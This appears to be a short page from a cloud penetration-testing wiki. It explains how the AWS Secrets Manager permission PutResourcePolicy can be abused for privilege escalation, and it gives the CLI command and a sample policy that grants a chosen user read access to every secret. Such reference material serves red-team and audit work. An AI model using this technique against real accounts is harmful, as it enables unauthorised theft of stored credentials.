Secrets Manager - PrivEsc

Abusable AWS Secrets Manager permissions that can lead to compromise or privilege escalation

secretsmanager:PutResourcePolicy

With access to this action, you can attach a resource-based permission policy to a secret, effectively giving yourself whatever access you want.

aws secretsmanager put-resource-policy --secret-id <secretId> --resource-policy file://secrets-policy.json

# sample resource policy for secret

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "*"
        }
    ]
}

PreviousS3 - PrivEsc NextSTS - PrivEsc

Last updated 8 months ago